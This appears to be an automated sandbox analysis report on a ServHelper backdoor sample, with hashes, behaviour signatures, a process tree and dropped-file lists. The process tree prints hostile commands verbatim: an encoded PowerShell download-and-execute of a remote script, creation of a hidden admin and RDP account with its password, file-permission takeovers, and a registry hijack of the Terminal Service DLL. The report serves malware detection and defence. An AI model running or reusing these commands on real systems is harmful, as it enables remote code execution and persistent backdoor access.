Analysis
- max time kernel: 123s
- max time network: 68s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 16-06-2021 10:08

Static task: static1
Behavioral task: behavioral1
  Sample: 6efc7601be401f3e9b49f4f2cf63fee9.exe
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample: 6efc7601be401f3e9b49f4f2cf63fee9.exe
  Resource: win10v20210410

General
- Target: 6efc7601be401f3e9b49f4f2cf63fee9.exe
- Size: 6.0MB
- MD5: 6efc7601be401f3e9b49f4f2cf63fee9
- SHA1: 6c975b9f64a3e0840c43f11571bc4b1bccdc3d83
- SHA256: 9d2a3042c4e2d68df7a39cd7efae7c64f2b7ed5ae507bac9282e154591757724
- SHA512: 87998010dd888280388f65637945aca1c641c45ad482d9abb193b1f00c5838aff22dcec68c695feb357dab26f536edd8364640cda4814de461c506b1ff288c7a

Malware Config
- Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
- ServHelper
  ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
- Grants admin privileges (1 TTP)
  Uses net.exe to modify the user's privileges.
- Blocklisted process makes network request (1 IoC)
  Processes (flow, pid, process):
    11, 1652, powershell.exe
- Modifies RDP port number used by Windows (1 TTP)
- Possible privilege escalation attempt (8 IoCs)
  Processes (pid, process):
    1488 icacls.exe
    1108 icacls.exe
    1716 icacls.exe
    1848 takeown.exe
    1912 icacls.exe
    1656 icacls.exe
    1448 icacls.exe
    968 icacls.exe
- Sets DLL path for service in the registry (2 TTPs)
- Processes (resource, yara_rule):
    \Windows\Branding\mediasrv.png  upx
    \Windows\Branding\mediasvc.png  upx
- Loads dropped DLL (2 IoCs)
  Processes (pid, process):
    1008
    1008
- Modifies file permissions (1 TTP, 8 IoCs)
  Processes (pid, process):
    1912 icacls.exe
    1656 icacls.exe
    1448 icacls.exe
    968 icacls.exe
    1488 icacls.exe
    1108 icacls.exe
    1716 icacls.exe
    1848 takeown.exe
- Drops file in System32 directory (1 IoC)
  Processes (description, ioc, process):
    File created: C:\Windows\system32\rfxvmt.dll (powershell.exe)
- Drops file in Windows directory (21 IoCs)
  Processes (description, ioc, process):
    File opened for modification: C:\Windows\branding\wupsvc.jpg (powershell.exe)
    File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ecbca51e-cf77-48c4-89c1-256b1b9452e2 (powershell.exe)
    File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ac48c8ba-a960-4b13-9ba2-274b29db0955 (powershell.exe)
    File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c92c7012-ad89-4317-80e7-0ca0c5aa7d0f (powershell.exe)
    File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5fa17bba-6d93-4391-87f1-0d2494b5e9af (powershell.exe)
    File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex (powershell.exe)
    File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1489e6ef-3da2-4fa3-9302-0487b532c31e (powershell.exe)
    File created: C:\Windows\branding\mediasrv.png (powershell.exe)
    File created: C:\Windows\branding\wupsvc.jpg (powershell.exe)
    File opened for modification: C:\Windows\branding\Basebrd (powershell.exe)
    File opened for modification: C:\Windows\branding\ShellBrd (powershell.exe)
    File opened for modification: C:\Windows\branding\mediasvc.png (powershell.exe)
    File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZAYZROMQ7ZO2THTDRTBD.temp (powershell.exe)
    File created: C:\Windows\branding\mediasvc.png (powershell.exe)
    File opened for modification: C:\Windows\branding\mediasrv.png (powershell.exe)
    File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8a0e20a9-69c1-41c3-8c37-c82268ebfc22 (powershell.exe)
    File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9254e15b-add2-45f7-9687-55497be1d2ba (powershell.exe)
    File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bfdc98ea-0558-44c2-9712-23bfe1a04ef7 (powershell.exe)
    File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5ab54430-66b0-45a8-a8be-96c25f90f157 (powershell.exe)
    File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a5930fd0-832c-407e-b0e8-50488971c736 (powershell.exe)
    File opened for modification: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5311f1cf-24df-4d12-bdf4-b836ab89cb28 (powershell.exe)
- Modifies data under HKEY_USERS (4 IoCs)
  Processes (description, ioc, process):
    Key created: \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage (powershell.exe)
    Set value (data): \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 700f2d279762d701 (powershell.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
    Key created: \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (WMIC.exe)
- Modifies registry key (1 TTP, 1 IoC)
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (13 IoCs)
  Processes (pid, process):
    1396 powershell.exe
    1396 powershell.exe
    960 powershell.exe
    960 powershell.exe
    1764 powershell.exe
    1764 powershell.exe
    1928 powershell.exe
    1928 powershell.exe
    1396 powershell.exe
    1396 powershell.exe
    1396 powershell.exe
    1652 powershell.exe
    1652 powershell.exe
- Suspicious behavior: LoadsDriver (5 IoCs)
  Processes (pid, process):
    468
    1008
    1008
    1008
    1008
- Suspicious use of AdjustPrivilegeToken (18 IoCs)
  Processes (description, pid, process):
    Token: SeDebugPrivilege 1396 powershell.exe
    Token: SeDebugPrivilege 960 powershell.exe
    Token: SeDebugPrivilege 1764 powershell.exe
    Token: SeDebugPrivilege 1928 powershell.exe
    Token: SeRestorePrivilege 1656 icacls.exe
    Token: SeAssignPrimaryTokenPrivilege 820 WMIC.exe
    Token: SeIncreaseQuotaPrivilege 820 WMIC.exe
    Token: SeAuditPrivilege 820 WMIC.exe
    Token: SeAssignPrimaryTokenPrivilege 820 WMIC.exe
    Token: SeIncreaseQuotaPrivilege 820 WMIC.exe
    Token: SeAuditPrivilege 820 WMIC.exe
    Token: SeAssignPrimaryTokenPrivilege 1588 WMIC.exe
    Token: SeIncreaseQuotaPrivilege 1588 WMIC.exe
    Token: SeAuditPrivilege 1588 WMIC.exe
    Token: SeAssignPrimaryTokenPrivilege 1588 WMIC.exe
    Token: SeIncreaseQuotaPrivilege 1588 WMIC.exe
    Token: SeAuditPrivilege 1588 WMIC.exe
    Token: SeDebugPrivilege 1652 powershell.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (description, pid, process, target process):
    PID 788 wrote to memory of 1396: 6efc7601be401f3e9b49f4f2cf63fee9.exe -> powershell.exe (3 entries)
    PID 1396 wrote to memory of 572: powershell.exe -> csc.exe (3 entries)
    PID 572 wrote to memory of 1488: csc.exe -> cvtres.exe (3 entries)
    PID 1396 wrote to memory of 960: powershell.exe -> powershell.exe (3 entries)
    PID 1396 wrote to memory of 1764: powershell.exe -> powershell.exe (3 entries)
    PID 1396 wrote to memory of 1928: powershell.exe -> powershell.exe (3 entries)
    PID 1396 wrote to memory of 1848: powershell.exe -> takeown.exe (3 entries)
    PID 1396 wrote to memory of 1912: powershell.exe -> icacls.exe (3 entries)
    PID 1396 wrote to memory of 1656: powershell.exe -> icacls.exe (3 entries)
    PID 1396 wrote to memory of 1448: powershell.exe -> icacls.exe (3 entries)
    PID 1396 wrote to memory of 968: powershell.exe -> icacls.exe (3 entries)
    PID 1396 wrote to memory of 1488: powershell.exe -> icacls.exe (3 entries)
    PID 1396 wrote to memory of 1108: powershell.exe -> icacls.exe (3 entries)
    PID 1396 wrote to memory of 1716: powershell.exe -> icacls.exe (3 entries)
    PID 1396 wrote to memory of 820: powershell.exe -> reg.exe (3 entries)
    PID 1396 wrote to memory of 1764: powershell.exe -> reg.exe (3 entries)
    PID 1396 wrote to memory of 332: powershell.exe -> reg.exe (3 entries)
    PID 1396 wrote to memory of 1352: powershell.exe -> net.exe (3 entries)
    PID 1352 wrote to memory of 1160: net.exe -> net1.exe (3 entries)
    PID 1396 wrote to memory of 1920: powershell.exe -> cmd.exe (3 entries)
    PID 1920 wrote to memory of 1980: cmd.exe -> cmd.exe (3 entries)
    PID 1980 wrote to memory of 672: cmd.exe -> net.exe (1 entry)
Processes
- C:\Users\Admin\AppData\Local\Temp\6efc7601be401f3e9b49f4f2cf63fee9.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\6efc7601be401f3e9b49f4f2cf63fee9.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    Signatures: Drops file in System32 directory; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gne0it5f\gne0it5f.cmdline"
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB4.tmp" "c:\Users\Admin\AppData\Local\Temp\gne0it5f\CSC7D194C37303741B193EC4998D4B92816.TMP"
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\takeown.exe
      Command line: "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe
      Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe
      Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
      Signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\icacls.exe
      Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe
      Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe
      Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe
      Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\icacls.exe
      Command line: "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
      Signatures: Possible privilege escalation attempt; Modifies file permissions
    - C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    - C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      Signatures: Modifies registry key
    - C:\Windows\system32\reg.exe
      Command line: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    - C:\Windows\system32\net.exe
      Command line: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\net1.exe
        Command line: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    - C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      Signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe
        Command line: cmd /c net start rdpdr
        Signatures: Suspicious use of WriteProcessMemory
        - C:\Windows\system32\net.exe
          Command line: net start rdpdr
          - C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 start rdpdr
    - C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      - C:\Windows\system32\cmd.exe
        Command line: cmd /c net start TermService
        - C:\Windows\system32\net.exe
          Command line: net start TermService
          - C:\Windows\system32\net1.exe
            Command line: C:\Windows\system32\net1 start TermService
    - C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    - C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user WgaUtilAcc 000000 /del
  - C:\Windows\system32\net.exe
    Command line: net.exe user WgaUtilAcc 000000 /del
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user WgaUtilAcc VCrq2Nmi /add
  - C:\Windows\system32\net.exe
    Command line: net.exe user WgaUtilAcc VCrq2Nmi /add
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user WgaUtilAcc VCrq2Nmi /add
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  - C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
  - C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  - C:\Windows\system32\net.exe
    Command line: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
- C:\Windows\System32\cmd.exe
  Command line: cmd /C net.exe user WgaUtilAcc VCrq2Nmi
  - C:\Windows\system32\net.exe
    Command line: net.exe user WgaUtilAcc VCrq2Nmi
    - C:\Windows\system32\net1.exe
      Command line: C:\Windows\system32\net1 user WgaUtilAcc VCrq2Nmi
- C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic path win32_VideoController get name
  - C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic path win32_VideoController get name
    Signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C wmic CPU get NAME
  - C:\Windows\System32\Wbem\WMIC.exe
    Command line: wmic CPU get NAME
    Signatures: Modifies data under HKEY_USERS; Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\cmd.exe
  Command line: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  - C:\Windows\system32\cmd.exe
    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      Signatures: Blocklisted process makes network request; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_13eae950-77fa-4153-8e51-20b2543aef9d
  MD5: 7f79b990cb5ed648f9e583fe35527aa7
  SHA1: 71b177b48c8bd745ef02c2affad79ca222da7c33
  SHA256: 080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
  SHA512: 20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_194873f5-54bc-48c3-84de-bb76ef3a2d13
  MD5: 2d5cd190b5db0620cd62e3cd6ba1dcd3
  SHA1: ff4f229f4fbacccdf11d98c04ba756bda80aac7a
  SHA256: ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
  SHA512: edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_194eb184-d582-463d-9222-bb3d706a9c2f
  MD5: 6f0d509e28be1af95ba237d4f43adab4
  SHA1: c665febe79e435843553bee86a6cea731ce6c5e4
  SHA256: f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
  SHA512: 8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_518bdf91-9993-4c20-a6dd-351089e49777
  MD5: e5b3ba61c3cf07deda462c9b27eb4166
  SHA1: b324dad73048be6e27467315f82b7a5c1438a1f9
  SHA256: b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
  SHA512: a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7ce354c4-505c-4f89-9359-15220231a83c
  MD5: a70ee38af4bb2b5ed3eeb7cbd1a12fa3
  SHA1: 81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
  SHA256: dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
  SHA512: 8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8de9fa74-e6b4-4059-995b-0169cde3c5c3
  MD5: faa37917b36371249ac9fcf93317bf97
  SHA1: a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
  SHA256: b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
  SHA512: 614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_99ddb745-81ca-4d40-a6af-134398635475
  MD5: d89968acfbd0cd60b51df04860d99896
  SHA1: b3c29916ccb81ce98f95bbf3aa8a73de16298b29
  SHA256: 1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
  SHA512: b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  MD5: e22a7ed1ee0b35efefe5838362dff35c
  SHA1: e7c04d18a5993edfde96718d8657c0d9d553ad0d
  SHA256: 87356069921edef3c80299f46b28ee53e269e8960a27c81be027f3153ad5167e
  SHA512: 48f2b7a049022eb3d4ecab3b36dfde4655c43ac50b44ec5bfabc59d03004ae97dbd87604e40d456809b9365f8accca1c2088573f553d92a676684ee23d65d92d
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  MD5: 32024d961bb4ebbed09e3dd977720bb8
  SHA1: 6432488ebe99f320f6d067a9a3fc66d08ce26ecb
  SHA256: 7480f761dbf2a9599f2dfafef816b8db4386f441f8aa50388f24c9b2ae524d06
  SHA512: f5d7dec7ec438f5393bf6c12cbceb1c7cf0386be98d5ee4b4246fdb71865434a28e424e02db69badd26b915575e8cc5a509ed7e03927e254d34b34ca00013c35
- C:\Users\Admin\AppData\Local\Temp\RESBB4.tmp
  MD5: 4e0bd51aecf2afb16c7886c4b457894b
  SHA1: f6401b5c7d111d26b172272c23242965473985f9
  SHA256: f085b329b1a60e79e26519731b1c8cbc6069f929343079a0f5f28fca2f608457
  SHA512: 55457a50285dcb90a29406520ba097ab436c5bf0b87c59543867f5d9586723711fdcefb575e05f5a9b94c89dab71c4f27599258c433a1f648291fc90164d7b2b
- C:\Users\Admin\AppData\Local\Temp\gne0it5f\gne0it5f.dll
  MD5: 140027bfe290ab404084021f83bac7ec
  SHA1: d9fb4e4b55a78d3080dc03f50520baaff05cc478
  SHA256: e1d2ffd0e3133ecd67581eb5b7a5f4a1b8fa633f8672b64eb9dc8e71317e41e2
  SHA512: 6deb22938fb84bef866728d516e12e067d5a6e26da1560c5ef89abbfd82677876cf0ec36bb3373aad105f94a01c5b759b4d245c614029a441dd0ef9d78c2fe1d
- C:\Users\Admin\AppData\Local\Temp\ready.ps1
  MD5: 3447df88de7128bdc34942334b2fab98
  SHA1: 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
  SHA256: 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
  SHA512: 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
- C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
  MD5: 7cc73f9b87540e85212f709eafca7ea8
  SHA1: 3f43a1e1044dfb8d3354f055a5461d265719fa0e
  SHA256: 7147ad654973c344899b83fc6cf91fcc9ff39a83b5ef5d8521239fd2a37f8df5
  SHA512: c47acb6bed89647059b4a9ef052d4414d79697658c8f7d851ff84f3c64f2e7ce9631525db439a1279a8622d2ed74d838cef48fd235701d98d5da6a8c0f83dea3
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 06d56e9bd6a654afd44839be3ceec699
  SHA1: cfc820a21c101b0f54c807494bd73dc9efa95643
  SHA256: d1ecda791923ca0ae98bcff84c9d620c3bf3ac3fccf909dd3a6ea6597299ac07
  SHA512: 36488253d7c4f90b5980a1865911b5f6ba5f5483c203c14218ecdd6a3399a704be26a98fc610fdd87e1967dd198cf71c05278304dcb3b4c9b43d9ee0c4632e71
- C:\Windows\system32\rfxvmt.dll
  MD5: dc39d23e4c0e681fad7a3e1342a2843c
  SHA1: 58fd7d50c2dca464a128f5e0435d6f0515e62073
  SHA256: 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
  SHA512: 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
- \??\PIPE\lsarpc
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
- \??\PIPE\samr
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
- \??\c:\Users\Admin\AppData\Local\Temp\gne0it5f\CSC7D194C37303741B193EC4998D4B92816.TMP
  MD5: 4d59beec10c936ee1a78b676bd7408ac
  SHA1: a4763348d0ed2a90844ad62e3511193356fb9238
  SHA256: 37f15fba6f5c6b606f20285cea115e235ff5d768613449773a50db907fdad4a0
  SHA512: 02a127a99b9b217671a68e3106a349f8523061ffa970885b5c5f3912bba8d924eb2f669e19772dbdbf223cf14fb20b06d4e597442d316155cfe0d87ebd99cb9c
- \??\c:\Users\Admin\AppData\Local\Temp\gne0it5f\gne0it5f.0.cs
  MD5: 4864fc038c0b4d61f508d402317c6e9a
  SHA1: 72171db3eea76ecff3f7f173b0de0d277b0fede7
